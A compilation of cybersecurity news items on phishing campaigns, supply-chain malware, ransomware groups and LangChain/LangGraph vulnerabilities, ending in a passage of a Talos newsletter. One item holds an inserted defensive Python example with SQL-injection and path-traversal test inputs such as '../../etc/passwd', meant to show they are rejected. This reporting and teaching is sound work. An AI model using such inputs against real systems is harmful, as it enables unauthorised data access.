Cyberattackers have set their sights on French-speaking professionals, luring victims with fake résumé attachments in an active phishing campaign designed to deploy credential stealers and cryptocurrency miners. The activity, now tracked as FAUX#ELEVATE, relies on heavily obfuscated VBScript files disguised as CV documents, which execute silently while displaying fake error messages. The malware uses sandbox evasion, persistence techniques, and a domain-check mechanism to ensure only enterprise systems are infected.

Source: Securonix

Once the attackers gain elevated privileges, the malware disables security defenses, modifies system settings, and downloads additional payloads from legitimate platforms and infrastructure such as Dropbox, Moroccan WordPress sites, and mail[.]ru. This abuse of valid services allows the attackers to stage the payloads, host a command and control (C2) configuration, and exfiltrate browser credentials and desktop files.

The campaign stands out for its “living-off-the-land” approach, which is defined by blending malicious activity with trusted services to evade detection. It also uses advanced techniques to bypass browser encryption and maximize system resource exploitation. After execution, most artifacts are removed to limit forensic visibility, leaving only persistent mining and backdoor components.

Notably, the entire infection chain executes in under 30 seconds, enabling rapid compromise and data theft. By selectively targeting domain-joined systems, attackers ensure high-value corporate credentials are harvested, making the campaign particularly dangerous for enterprise environments.

Campaigns like FAUX#ELEVATE show that even heavily obfuscated malware still presents multiple choke points for detection, from malicious scripting chains and abuse of legitimate services to anomalous outbound traffic. A modern, capable EDR with strong behavioral detection and endpoint visibility can detect and stop activity like this despite the obfuscation.

The Ugly | TeamPCP Hijacks Trivy, npm, and LiteLLM to Steal Credentials Worldwide

Over the past week, a cloud-focused threat actor called TeamPCP orchestrated a multi-stage, global supply chain campaign, beginning with a compromise of the widely used Trivy vulnerability scanner. By injecting malicious code into Trivy v0.69.4 and associated GitHub Actions, TeamPCP harvested credentials, SSH keys, cloud tokens, CI/CD secrets, and cryptocurrency wallets. The malware persisted via systemd services and exfiltrated stolen data to typosquatted or attacker-controlled domains.

Source: Phoenix Security

Following the Trivy breach, TeamPCP deployed CanisterWorm, a self-propagating npm malware that leveraged compromised developer tokens to infect additional packages. CanisterWorm used a decentralized ICP canister as a resilient dead-drop C2, enabling automated payload updates and credential theft without direct attacker interaction.

The group then expanded to Aqua Security’s broader GitHub ecosystem, tampering with private repositories and Docker images, and to Checkmarx workflows and VS Code extensions, using the same credential-stealing payload to cascade compromises across CI/CD pipelines. Kubernetes clusters have also been targeted with scripts that wiped machines in Iranian locales while installing persistent backdoors elsewhere, demonstrating both selective destruction and lateral movement.

In the most recent leg of the offensive, TeamPCP compromised the popular “LiteLLM” Python package on PyPI, embedding the same cloud stealer and persistence mechanisms into versions 1.82.7 and 1.82.8. The attack harvested credentials, accessed Kubernetes secrets, and installed persistent systemd services while exfiltrating data to infrastructure controlled by the attackers.

Across this cluster of linked incidents, TeamPCP’s operations highlight the danger of credential reuse, incomplete secret rotation, and weak CI/CD hygiene, pointing to how a single supply chain compromise can cascade into a multi-platform, multi-stage attack that spans open-source software, cloud services, and developer ecosystems.



from SentinelOne https://ift.tt/W3Lt9RU
via IFTTT

AitM Phishing Targets TikTok Business Accounts Using Cloudflare Turnstile Evasion

Threat actors are using adversary-in-the-middle (AitM) phishing pages to seize control of TikTok for Business accounts in a new campaign, according to a report from Push Security.

Business accounts associated with social media platforms are a lucrative target, as they can be weaponized by bad actors for malvertising and distributing malware.

"TikTok has been historically abused to distribute malicious links and social engineering instructions," Push Security said. "This includes multiple infostealers like Vidar, StealC, and Aura Stealer delivered via ClickFix-style instructions with AI-generated videos posed as activation guides for Windows, Spotify, and CapCut."

The campaign begins with tricking victims into clicking on a malicious link that directs them to either a lookalike page impersonating TikTok for Business or a page that's designed to impersonate Google Careers, along with an option to schedule a call to discuss the opportunity.

It's worth noting that a prior iteration of this credential phishing campaign was flagged by Sublime Security in October 2025, with emails masquerading as outreach messages used as a social engineering tactic.

Regardless of the type of page served, the end goal is the same: perform a Cloudflare Turnstile check to block bots and automated scanners from analyzing the contents of the page, then serve a malicious AitM phishing login page that's designed to steal the victim's credentials.

The phishing pages are hosted on the following domains -

  • welcome.careerscrews[.]com
  • welcome.careerstaffer[.]com
  • welcome.careersworkflow[.]com
  • welcome.careerstransform[.]com
  • welcome.careersupskill[.]com
  • welcome.careerssuccess[.]com
  • welcome.careersstaffgrid[.]com
  • welcome.careersprogress[.]com
  • welcome.careersgrower[.]com
  • welcome.careersengage[.]com

The development comes as another phishing campaign has been observed using Scalable Vector Graphics (SVG) file attachments to deliver malware to targets located in Venezuela.

According to a report published by WatchGuard, the messages have SVG files with file names in Spanish, masquerading as invoices, receipts, or budgets. 

"When these malicious SVGs are opened, they communicate with a URL that downloads the malicious artifact," the company said. "This campaign uses ja.cat to shorten URLs from legitimate domains that have a vulnerability that allows redirects to any URL, so they point to the original domain where the malware is downloaded."

The downloaded artifact is Go-based malware that shares overlaps with a BianLian ransomware sample detailed by SecurityScorecard in January 2024.

"This campaign is a strong reminder that even seemingly harmless file types like SVGs can be used to deliver serious threats," WatchGuard said. "In this case, malicious SVG attachments were used to initiate a phishing chain that led to malware delivery associated with BianLian activity."



from The Hacker News https://ift.tt/fIqk3zH
via IFTTT

We Are At War

Rising geopolitical tensions are reflected (or in some cases preceded) by cyber operations, while technology itself has become politicized. Let’s admit it: we are in the middle of it. 

Introduction: One tech power to rule them all is a thing of the past 

The relative safety, peace and prosperity that much of the world has enjoyed since 1945 was not accidental. It emerged from the ashes of two world wars and the deliberate construction of a new global order. The United States of America set the terms of this new world.

The long peace under Pax Americana provided a stable foundation, but that foundation is shifting. Europe’s deep strategic dependence on the U.S.’s technological and cybersecurity capabilities, from intelligence and infrastructure to frameworks and funding, is now being tested. Those tectonic geopolitical changes are undermining trust, threatening the state of safety, and compelling European organizations to rethink digital architectures and approaches at every level.

All technology is now political, involved as a weapon, a target, or a lever in geopolitical conflict. As a political entity increases its reliance on technology platforms, it increases its exposure to technical power projection in the form of cyber and psychological operations, misinformation campaigns, and similar activity.

Welcome to the jungle (again)

The contemporary threat landscape is not a simple product of the whims or choices of criminal hackers and other threat actors. Instead, there is a diversity of actors - both benign and malicious - that have an influence. Those actors operate within a context that is, in turn, defined by the complex interactions between yet another set of systemic forces.

To understand the threat landscape, we must therefore consider all the systemic factors that shape it, as well as the actors that operate within it.

In our research efforts, we keep assessing how political, economic, social, and technological factors influence operations and risks.

State Actors and Critical Infrastructure

  • Night Dragon (mid-2000s onward): A China-linked campaign against energy and defense firms globally illustrated the move from opportunistic hacking to long-dwell, state-sponsored industrial espionage [1]
  • Volt Typhoon Botnet Disruption (Jan 2024): The U.S. government announced a court-authorized operation to dismantle a botnet of compromised routers used by the Chinese state-sponsored group Volt Typhoon in pre-positioning within U.S. critical infrastructure [2]
  • Salt Typhoon Telecom Breaches (Oct 2024): A global compromise of major telecom networks, attributed to the Chinese-linked group Salt Typhoon, exposed how state actors could access the communications of government officials and a multitude of civilians [3]
  • U.S. Advisory on Critical Infrastructure Targeting (Feb 2024): The U.S. and allied agencies issued a joint advisory declaring that Volt Typhoon had compromised IT networks across communications, energy, transport, and water sectors, marking a milestone in recognizing state cyber power as a strategic threat [4].

State-linked cyber operations have remained active with a primary focus on intelligence collection and occasional disruptive actions used for signaling, amid a backdrop of information operations that vary widely in scale and intensity [5].

Attack methods are concentrating on identity and the edge [6]. Recent reporting also describes stealthy backdoors placed on appliances and virtualization platforms to maintain access for many months without noisy malware [7]. In parallel, rapid exploitation of 0-day and n-day vulnerabilities in perimeter appliances remains common, and supplier and service-provider pathways continue to feature prominently in incident trends [8].

Security Navigator 2026 is Here - Download Now

The newly released Security Navigator 2026 offers critical insights into current digital threats, documenting 139,373 incidents and 19,053 confirmed breaches. More than just a report, it serves as a guide to navigating a safer digital landscape.

What's Inside?

  • 📈 In-Depth Analysis: Statistics from CyberSOC, Vulnerability scanning, Pentesting, CERT, Cy-X and Ransomware observations from Dark Net surveillance.
  • 🔮 Future-Ready: Equip yourself with security predictions and stories from the field.
  • 🧠 Stories from security practitioners across the world.
  • 👁️ Security deep-dives: Get briefed on emerging trends related to Generative AI, Operational Technology and post-quantum cryptography.

Stay one step ahead in cybersecurity. Your essential guide awaits!


Targeting remains concentrated on government and telecommunications, with repeated activity against defense-linked networks [9]. High-tech sectors, notably semiconductors, also saw focused campaigns in 2025 [10]. The seam between enterprise IT and OT in industrial environments remains a concern, with pivots into plant and field systems where monitoring is limited and safety constraints slow response. Open reporting also indicates continued use of commercial spyware by government clients, with fresh forensic cases against journalists in 2025 [11].

This state-linked picture is only part of the landscape. Non-state actors, as well as criminals and hacktivists, increasingly operate alongside or in the wake of state campaigns.

Hacktivists: From Cyberspace Vigilantes To State-Aligned Bullies

  • 7 April 2025: Attackers seized control of the Bremanger dam in Norway, opened floodgates, and released 500 litres of water per second for four hours. The intrusion was later attributed to Russian hackers by Norway's security service [12].
  • 7 May 2025: The National Cyber Security Center (UK) reports that the pro-Russian hacktivist group NoName057(16) had claimed a three-day DDoS campaign against several UK public sector websites [13]
  • 17 June 2025: Predatory Sparrow claims to have destroyed data at the Iranian state-owned Bank Sepah, causing outages for customers [14]
  • 16 July 2025: Europol announces that the global “Operation Eastwood” disrupted the infrastructure of NoName057(16), marking a coordinated law-enforcement action against a hacktivist network [15]
  • 14 August 2025: Norway's intelligence service publicly attributes the dam intrusion to pro-Russian cyber actors and warns of the rising threat they pose [16].
  • 29 October 2025: The Canadian Centre for Cyber Security alerts that hacktivist groups had breached water, energy, and agricultural OT/ICS systems in Canada, manipulating water pressure, temperature, and humidity levels [17].

As we’ve previously reported [18], hacktivism has entered its “establishment” era. Once a form of digital protest directed against institutions of power, it has evolved into a complex ecosystem of state-aligned and ideologically driven actors that often serve as informal extensions of geopolitical influence. The term “hacktivism” itself today conceals more than it reveals. It no longer refers simply to fringe collectives with political messages, but to distributed, collaborative movements capable of real-world disruption and widespread cognitive manipulation.

We increasingly see boundaries between hackers, activists, and state actors dissolving. Groups such as NoName057(16) and Killnet operate independently, but in support of their host states, attacking adversarial governments and institutions while maintaining plausible deniability for their state beneficiaries. 

Recent events illustrate the implications of this shift. Distributed-denial-of-service operations remain the most visible form of hacktivism, yet the targets and intent are changing. Campaigns by pro-Russian groups in 2025 disrupted British public services and European infrastructure, not for ransom or data theft but to broadcast political narratives and erode confidence in institutions [19]. In Norway, attackers remotely manipulated a valve at the Bremanger dam, prompting fears of cyber-physical escalation [20]. Around the same time, a Russian-aligned group claimed access to a water-utility system (though that later proved to be a security honeypot) [21].

More recently, Canadian authorities have reported that hacktivist groups breached critical infrastructure, including water, energy and agricultural sites [22]. The attacks involved tampering with pressure valves at a water facility, manipulating an automated tank gauge at an oil and gas company and exploiting temperature and humidity levels at a grain silo on a farm. The symbolism of these incidents is as potent as the technical impact: they demonstrate reach into critical systems, even when the damage is contained, and catalyze exactly the kind of panicked narratives the actors desire.

The risk is twofold. First, the risk of serious cyber-physical attacks is growing. While most hacktivist incidents remain low impact, the “addiction” of hacktivist groups to increased visibility and impact suggests they will continue to seek bigger and bolder opportunities. The growing familiarity of such groups with industrial and operational technology increases the likelihood of genuine harm. Attacks that were once digital graffiti could, by accident or intent, evolve into events with physical consequences. Second, the convergence of criminal, ideological, and state interests creates a synergy between information operations and infrastructure attacks. The target is no longer a single system but the public mind: to exhaust trust, polarize societies, and reshape narratives.

Cyber Extortion Is Still the Big Gorilla

  • 20 March 2024: The Bundeskriminalamt (BKA, German Federal Criminal Police), together with Frankfurt’s ZIT cyber-unit, conducted a takedown of the darknet marketplace “Nemesis Market”, seizing infrastructure in Germany and Lithuania [23]
  • 30 May 2024: Authorities participating in Operation ENDGAME announce arrests of four suspects in Ukraine and Armenia, the takedown of internet servers and control of domains tied to botnets [24]
  • December 2024: The Cl0p ransomware gang launched a major campaign exploiting a zero-day vulnerability in Cleo managed file-transfer software, leading to hundreds of victims [25]
  • 14 January 2025: The UK Home Office publishes a consultation paper proposing a targeted ban on ransomware payments by all UK public sector bodies and critical national infrastructure and introducing mandatory incident-reporting for ransomware events [26]
  • 19-22 May 2025: In the latest phase of Operation ENDGAME, law-enforcement agencies dismantle servers, neutralize domains, and issue arrest warrants for 20 suspects [27]
  • June 2025: A follow-up to Operation ENDGAME results in additional actions and detentions targeting successor groups and affiliates of initial-access ecosystems [28]
  • 22 July 2025: The UK government announces its formal intention to ban public bodies from paying ransoms, and to legislate for mandatory reporting of incidents and payments [29]
  • 11 August 2025: The US Department of Justice announces a coordinated disruption of the ransomware group BlackSuit (Royal), involving multiple countries [30].

Cyber extortion attacks have expanded to nearly every region and every size of business. Where large firms in developed economies previously dominated statistics, victims this year include firms in countries added to our extortion datasets for the first time. 

The entry costs for attackers have plummeted thanks to the commoditization of malware-as-a-service, initial access brokers, and cryptocurrency-enabled monetization. A single vulnerability in commonly used software can yield hundreds or thousands of victims overnight, as seen when Cl0p exploited another file-transfer platform to trigger the largest wave of victims we've ever recorded [31].

Our data shows not only more victims, but also more actors. The victims-per-actor ratio has increased, suggesting that extortion groups are operating at a greater scale and with greater reuse of infrastructure.

We observe three key trends:

  1. Despite years of focus and substantial investment in defensive controls, the number of victims continues to rise [32]. Ransomware and extortion attacks now represent a dominant share of cyber incidents, often accounting for more than a third of losses and exhibiting growth measured in multiples since the late 2010s [33]
  2. The techniques used by threat actors are, in many cases, well-known, straightforward, and theoretically avoidable [34]. Phishing, stolen credentials, unpatched systems, and misconfigured file-transfer appliances feature prominently in breach post-mortems. Yet these attacks persist and succeed, even when the theoretical controls exist. This points to a deeper problem than individual technical weakness. 
  3. The ecosystem behind these attacks is evolving rapidly. Our reporting shows that the cyber extortion ecosystem has matured into a decentralized, professionalized network of affiliates, service-providers, and facilitators, using the lowest cost, highest leverage vectors available. 

While we found that law enforcement and governments are responding more assertively, they must overcome jurisdictional fragmentation, safe-haven states, and an adversary that shifts shape and label constantly.

The fact that many of the techniques used in Cy-X compromises are "familiar, predictable and defeatable", yet somehow remain effective, requires urgent reflection. The recent breach at a major aerospace company - in which attackers accessed a server with old credentials, stole data, and followed up with a second ransomware team on the same system - illustrates how basic processes can fail at multiple layers [35]. If we know how to patch, how to secure credential access, how to maintain offline backups, and how to train staff, then why do firms keep falling victim? Three broad theories may explain it.

Firstly, many organizations simply adopt security technologies or controls that are inexpensive, unwieldy, or poorly aligned with their context. The tools may be present in theory, but fail in practice. Secondly, the adoption rate of basic cyber-hygiene practices may remain patchy, especially among smaller firms and in developing economies, leaving a wide attack surface still to be exploited. Finally, we may have placed too much faith in preventing breaches when today's environment also demands robust detection, response, and recovery capabilities.

Several major jurisdictions now participate regularly in multinational takedowns, arrests, and indictments. However, despite the increased volume of actions, the Cy-X ecosystem remains resilient. Some states tolerate or even shield domestic cyber-criminals, creating safe havens that thwart global efforts [36]. The net effect is that law enforcement action alone, while necessary, cannot tip the balance without significantly improved coordination, sustained pressure, and the elimination of safe havens.

A wholly new form of collaboration is required that is more reminiscent of a wartime society, in which a mutual adversary and shared goals surface a unique and authentic form of public-private partnership.

Cyber extortion is not a niche threat that will fade. It is a systemic challenge that will continue to grow unless we change how we think, defend, respond and collaborate. We have the technical knowledge and the policy tools. The challenge is to achieve collective execution at scale, global coordination, and the political will to treat this threat as the societal hazard it has become.

Conclusion: Hacktivists, Criminals, and Everything in Between

Hacktivism and the cyber landscape in general arguably reflect the political moment now more than ever before. It mirrors a world where conflict is constant, boundaries are porous, and narratives are as contested as territory. For security leaders, this is no longer a technical nuisance to be filtered or patched away. It is a strategic threat that must be met with shared awareness, cross-sector coordination, and a recognition that cybersecurity is inseparable from societal security.

Clearly, every organization must assume it is a target and prepare accordingly. Prevention remains essential, but so too does resilience through detection, incident response and recovery. Table-top exercises, live-fire rehearsal of recovery from backup systems and transparent post-breach introspection must become standard business practice. But businesses cannot individually repel these implacable adversaries.

Defending against all classes of threats requires more than technical resilience; it demands a societal approach. Companies and governments must acknowledge that the target is often collective cohesion and confidence. Keeping a website online during a DDoS attack does not sufficiently address the wider objective of undermining civic or institutional legitimacy. Collaboration between public and private sectors must therefore extend beyond incident response into coordinated communication, education, and cognitive defense. The challenge is not only to secure systems but to preserve the coherence of the societies that depend on them.

This opinion piece was brought to you by Charl van der Walt, Head of Security Research at Orange Cyberdefense and uses excerpts and sources from the Security Navigator 2026. If you want to explore some of these topics in more depth, head over to the Navigator page and download your copy of the full report.

  • [1] https://ift.tt/A0tsyFX
  • [2] https://ift.tt/0mfRZvM
  • [3] https://ift.tt/bz4gRmW
  • [4] https://ift.tt/IxoCuz5
  • [5] https://ift.tt/Zw9QYuF
  • [6] https://ift.tt/nAMGU03
  • [7] https://ift.tt/WLbJI09
  • [8] https://ift.tt/6uVJIbp
  • [9] https://ift.tt/UDF4GMq
  • [10] https://ift.tt/F8fU7mz
  • [11] https://ift.tt/5KlZpND
  • [12] https://ift.tt/JPhDeq8
  • [13] https://ift.tt/YhmvfoT
  • [14] https://ift.tt/tmgviQk
  • [15] https://ift.tt/eNcry8O
  • [16] https://ift.tt/GChfQJt
  • [17] https://ift.tt/jlYs3pf
  • [18] https://ift.tt/rJaBNTZ
  • [19] https://ift.tt/I5QDHzF
  • [20] https://ift.tt/8291Mru
  • [21] https://ift.tt/Or6NzsM
  • [22] https://ift.tt/jlYs3pf
  • [23] https://ift.tt/QvqKX36
  • [24] https://ift.tt/VNrEdl1
  • [25] https://ift.tt/WLPDRhT
  • [26] https://ift.tt/B0e3rys
  • [27] https://ift.tt/5y8ZI7J
  • [28] https://ift.tt/3yYvaAF
  • [29] https://ift.tt/Jl2khtB
  • [30] https://ift.tt/TAdocPD
  • [31] https://ift.tt/LiY5o3V
  • [32] https://ift.tt/zcOA9qF
  • [33] https://ift.tt/Z8vHN2S
  • [34] https://ift.tt/gle4Yv2
  • [35] https://www.bankinfosecurity.com/more-collins-aerospace-hacking-fallout-a-29848
  • [36] https://ift.tt/7eskYyd

Note: This article was expertly written and contributed by Charl van der Walt, Head of Security Research at Orange Cyberdefense.




from The Hacker News https://ift.tt/GafC74Q
via IFTTT

Bearlyfy Hits 70+ Russian Firms with Custom GenieLocker Ransomware

A pro-Ukrainian group called Bearlyfy has been attributed to more than 70 cyber attacks targeting Russian companies since it first surfaced in the threat landscape in January 2025, with recent attacks leveraging a custom Windows ransomware strain codenamed GenieLocker.

"Bearlyfy (also known as Labubu) operates as a dual-purpose group aimed at inflicting maximum damage upon Russian businesses; its attacks serve the dual objectives of extortion for financial gain and acts of sabotage," Russian security vendor F6 said.

The hacking group was first documented by F6 in September 2025 as leveraging encryptors associated with LockBit 3 (Black) and Babuk, with early intrusions focusing on smaller companies before upping the ante and demanding ransoms to the tune of €80,000 (about $92,100). By August 2025, the group had claimed at least 30 victims.

Beginning May 2025, Bearlyfy actors also utilized a modified version of PolyVice, a ransomware family attributed to Vice Society (aka DEV-0832 or Vanilla Tempest), which has a history of delivering third-party lockers such as Hello Kitty, Zeppelin, RedAlert, and Rhysida ransomware in their attacks. 

Further analysis of the threat actor's toolset and infrastructure uncovers overlaps with PhantomCore, another group that's assessed to be operating with Ukrainian interests in mind and that has been attacking Russian and Belarusian companies since 2022. Beyond PhantomCore, Bearlyfy is also said to have collaborated with Head Mare.

Attacks mounted by the group have obtained initial access through the exploitation of external services and vulnerable applications, followed by dropping tools like MeshAgent to facilitate remote access and enable encryption, destruction, or modification of data. In contrast, PhantomCore conducts APT-style campaigns, where reconnaissance, persistence, and data exfiltration take precedence.

"The group itself is distinguished by rapid-fire attacks characterized by minimal preparation and swift data encryption; another distinctive feature of these attacks is that ransom notes are not generated by the ransomware software itself, but are instead crafted directly by the attackers," F6 noted last year.

Bearlyfy's attacks have proven to be an illicit revenue generation stream. Per F6 data, about one in five victims opt to pay the ransom. The adversary's initial ransom demands are said to have escalated further, reaching hundreds of thousands of dollars.

The most noteworthy shift in the threat actor's modus operandi is the use of a proprietary ransomware family called GenieLocker to target Windows endpoints since the start of March 2026. GenieLocker's encryption scheme is inspired by Venus/Trinity ransomware families.

One of the most distinctive traits of the ransomware attacks is that the ransom notes are not automatically generated by the locker. Instead, the threat actors opt for their own methods to share the next steps with victims, either just sharing contact details or sending elaborate messages that seek to exert psychological pressure and force them into paying up.

"While in its early stages, Bearlyfy members demonstrated a lack of sophistication and were clearly experimenting with various techniques and toolsets, within the span of a single year, this group has evolved into a veritable nightmare for Russian businesses -- including major enterprises," F6 said.



from The Hacker News https://ift.tt/HTXr9t4
via IFTTT

LangChain, LangGraph Flaws Expose Files, Secrets, Databases in Widely Used AI Frameworks

Cybersecurity researchers have disclosed three security vulnerabilities impacting LangChain and LangGraph that, if successfully exploited, could expose filesystem data, environment secrets, and conversation history.

Both LangChain and LangGraph are open-source frameworks that are used to build applications powered by Large Language Models (LLMs). LangGraph is built on the foundations of LangChain for more sophisticated and non-linear agentic workflows. According to statistics on the Python Package Index (PyPI), LangChain, LangChain-Core, and LangGraph were downloaded more than 52 million, 23 million, and 9 million times, respectively, in the last week alone.

"Each vulnerability exposes a different class of enterprise data: filesystem files, environment secrets, and conversation history," Cyera security researcher Vladimir Tokarev said in a report published Thursday.

The issues, in a nutshell, offer three independent paths that an attacker can leverage to drain sensitive data from any enterprise LangChain deployment. Details of the vulnerabilities are as follows -

  • CVE-2026-34070 (CVSS score: 7.5) - A path traversal vulnerability in LangChain ("langchain_core/prompts/loading.py") that allows access to arbitrary files without any validation via its prompt-loading API by supplying a specially crafted prompt template.
  • CVE-2025-68664 (CVSS score: 9.3) - A deserialization of untrusted data vulnerability in LangChain that leaks API keys and environment secrets by passing as input a data structure that tricks the application into interpreting it as an already serialized LangChain object rather than regular user data.
  • CVE-2025-67644 (CVSS score: 7.3) - An SQL injection vulnerability in LangGraph's SQLite checkpoint implementation that allows an attacker to manipulate SQL queries through metadata filter keys and run arbitrary SQL queries against the database.
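As an added illustration from the defender's side (this is not LangChain's or LangGraph's own code, and it uses a constructed in-memory table rather than the real checkpoint schema), the block below shows the two vulnerability classes behind the first and third bullets: a search whose metadata filter keys are concatenated into the WHERE clause, next to a version that allowlists keys and binds values, and a prompt-path resolver that confines file loads to a base directory. The table columns, the `ALLOWED_FILTER_KEYS` set and all function names are assumptions made for this example.

```python
import sqlite3
from pathlib import Path

# --- 1. Metadata-filter keys spliced into SQL (the CVE-2025-67644 class) ----------

def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for a checkpoint store.
    The schema is illustrative and is not LangGraph's own."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE checkpoints (thread_id TEXT, source TEXT, step INTEGER, history TEXT)"
    )
    conn.executemany(
        "INSERT INTO checkpoints VALUES (?, ?, ?, ?)",
        [("thread-1", "input", 1, "history of thread 1"),
         ("thread-2", "loop", 2, "history of thread 2")],
    )
    return conn

def search_vulnerable(conn, metadata_filter: dict) -> list:
    """Anti-pattern: only the filter *values* are bound parameters; the *keys*
    are concatenated into the WHERE clause, so a caller-chosen key becomes SQL."""
    if not metadata_filter:
        return [r[0] for r in conn.execute("SELECT thread_id FROM checkpoints")]
    where = " AND ".join(f"{key} = ?" for key in metadata_filter)
    sql = f"SELECT thread_id FROM checkpoints WHERE {where}"
    return [r[0] for r in conn.execute(sql, list(metadata_filter.values()))]

# Fixed set of columns a caller may filter on (assumed for this example).
ALLOWED_FILTER_KEYS = frozenset({"thread_id", "source", "step"})

def search_hardened(conn, metadata_filter: dict) -> list:
    """Keys are checked against an allowlist of known column names and then
    emitted as quoted identifiers; values remain bound parameters."""
    unknown = set(metadata_filter) - ALLOWED_FILTER_KEYS
    if unknown:
        raise ValueError(f"unsupported metadata filter key(s): {sorted(unknown)}")
    if not metadata_filter:
        return [r[0] for r in conn.execute("SELECT thread_id FROM checkpoints")]
    where = " AND ".join(f'"{key}" = ?' for key in metadata_filter)
    sql = f"SELECT thread_id FROM checkpoints WHERE {where}"
    return [r[0] for r in conn.execute(sql, list(metadata_filter.values()))]

def hardened_rejects(conn, metadata_filter: dict) -> bool:
    """True if the hardened search refuses the filter instead of running it."""
    try:
        search_hardened(conn, metadata_filter)
    except ValueError:
        return True
    return False

# --- 2. Prompt paths that escape the prompt directory (the CVE-2026-34070 class) --

def resolve_prompt_path(base_dir: str, requested: str) -> Path:
    """Resolve a requested prompt file relative to base_dir and refuse anything
    that lands outside it. Absolute inputs and '..' segments are both caught
    because the check runs on the fully resolved path, not the raw string."""
    base = Path(base_dir).resolve()
    candidate = (base / requested).resolve()   # an absolute 'requested' replaces base here
    if base not in candidate.parents:
        raise ValueError(f"prompt path {requested!r} escapes {base}")
    return candidate

def prompt_path_rejected(base_dir: str, requested: str) -> bool:
    """True if the resolver refuses the requested path."""
    try:
        resolve_prompt_path(base_dir, requested)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    db = make_demo_db()
    print(search_hardened(db, {"source": "input"}))        # ['thread-1']
    print(hardened_rejects(db, {"1=1 OR step": 2}))        # True
    print(resolve_prompt_path("prompts", "chat/greeting.yaml"))
    print(prompt_path_rejected("prompts", "../../etc/passwd"))  # True
```

The two fixes share one idea: anything that ends up in the structural part of a query or a path (a column name, a directory) must come from a closed set the code controls, while caller data is only ever passed as a bound value or checked after full resolution. Quoting the identifier in `search_hardened` is defence in depth on top of the allowlist, not a substitute for it.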

Successful exploitation of the aforementioned flaws could allow an attacker to read sensitive files like Docker configurations, siphon sensitive secrets via prompt injection, and access conversation histories associated with sensitive workflows. It's worth noting that details of CVE-2025-68664 were also shared by Cyata in December 2025, giving it the cryptonym LangGrinch.

The vulnerabilities have been patched in the following versions -

  • CVE-2026-34070 - langchain-core >=1.2.22
  • CVE-2025-68664 - langchain-core 0.3.81 and 1.2.5
  • CVE-2025-67644 - langgraph-checkpoint-sqlite 3.0.1

The findings once again underscore how artificial intelligence (AI) plumbing is not immune to classic security vulnerabilities, potentially putting entire systems at risk.

The development comes days after a critical security flaw impacting Langflow (CVE-2026-33017, CVSS score: 9.3) came under active exploitation within 20 hours of public disclosure, enabling attackers to exfiltrate sensitive data from developer environments.

Naveen Sunkavally, chief architect at Horizon3.ai, said the vulnerability shares the same root cause as CVE-2025-3248, and stems from unauthenticated endpoints executing arbitrary code. With threat actors moving quickly to exploit newly disclosed flaws, it's essential that users apply the patches as soon as possible for optimal protection.

"LangChain doesn't exist in isolation. It sits at the center of a massive dependency web that stretches across the AI stack. Hundreds of libraries wrap LangChain, extend it, or depend on it," Cyera said. "When a vulnerability exists in LangChain’s core, it doesn’t just affect direct users. It ripples outward through every downstream library, every wrapper, every integration that inherits the vulnerable code path."



from The Hacker News https://ift.tt/SVngJMr
via IFTTT

Thursday, March 26, 2026

A puppet made me cry and all I got was this t-shirt


Welcome to this week’s edition of the Threat Source newsletter. 

Anyone who spoke with me in the last several weeks has had to deal with me loudly waiting in anticipation for the long-awaited “Project Hail Mary” movie adaptation. I read (and cried over) the book by Andy Weir, who’s also the author of “The Martian,” about a year ago and, shortly after, found out it was being made into a movie. 

(I know what you’re thinking: Two movie-themed editions in two weeks? It’s every cinephile’s dream!) 

Anyway, the story centers around a biologist and science teacher named Ryland Grace (Ryan Gosling), who wakes up from a coma on a spaceship light-years away from Earth, his two crewmembers long dead. Our planet's sun is slowly dimming, its energy being consumed by alien microbes called "astrophage" that are infecting all the stars in our stellar neighborhood — except one. Grace's task is to figure out why this star is unaffected and send the solution back to Earth. It's a one-way trip, and he'll eventually die in space alone... or so he thinks. 

The movie met 99.9% of my expectations, which is rare for an adaptation. The humor was spot-on, the soundtrack was gorgeous, and the puppetry — yes, the puppetry (mild spoilers for Rocky, Grace’s new alien friend) — was out-of-this-world. 

While it is a story about space, it’s first and foremost about communication, trust, and collaboration — things we’re no strangers to at Talos, especially when creating the Year in Review report (which is available now). The entire process of creating this report, from raw data to final design, is only a little bit less monumental than stopping alien microbes from plunging Earth into an ice age. 

The process begins with Talos’ Strategic Analysis team, who draw on Cisco’s vast telemetry, Talos research, and data from Talos Incident Response cases to analyze trends over the past year. This analysis is synthesized into a comprehensive report, which undergoes rigorous review and proofing at multiple levels. While the report is being drafted, the Strategic Comms team develops a detailed schedule of content and collateral to promote it both internally and externally, meeting weekly to track our progress. Once the text is finalized, it moves to our design team, who transform the data into a visually stunning, accessible format. Even after the report launches, the work continues: We produce videos, answer your questions on Reddit (today only!), record podcasts, create social media graphics, and collaborate across Cisco to ensure our findings reach the right people. 

We do this for the good of the community. Our report isn’t gated, and it never will be; you can read it right in your browser without filling out fake names and emails in annoying forms. Talos’ job is to keep as many people as safe as possible, and that means free access to critical information. Here's a taste of our findings: 

  • React2Shell was the No. 1 most targeted CVE in 2025 despite only being discovered in December. ToolShell was No. 3 despite being released in June. 
  • About 25% of the vulnerabilities on our top 100 list affect widely used frameworks and libraries, highlighting the risk of supply chain-style attacks. 
  • Nearly a third of MFA spray attacks targeted identity and access management (IAM) applications. 
  • Attackers continued to rely heavily on phishing for initial access, observed in 40% of Talos IR cases. 35% of cases involved internal phishing. 
  • Qilin was the most seen ransomware variant in 2025, with over 40 victims each month except January. 

We also offer insights on AI and state-sponsored threats, so be sure to view the full report.

In “Project Hail Mary,” Grace and his alien friend, Rocky, realize that they can't save their respective worlds alone. The Talos Year in Review is the result of a massive, cross-functional mission. It takes collaboration between all of Talos’ teams to turn complex, often daunting telemetry into actionable intelligence for the community. 

When we share knowledge, communicate clearly, and work together, the results are, to quote Rocky, “Amaze! Amaze! Amaze!” 

Stay tuned over the coming days and weeks as we break each section down into the most important 2025 Year in Review findings you need to know.


The one big thing 

One of the main themes from the 2025 Year in Review's vulnerability data is that attackers are targeting identity by compromising the infrastructure that sits around it, including physical hardware devices, software, and management platforms. Network components act as de facto identity gateways, allowing adversaries to impersonate users, bypass MFA, and traverse networks undetected. Attackers overwhelmingly prefer high-access targets that require minimal exploitation steps and yield maximum operational payoff. 

Why do I care? 

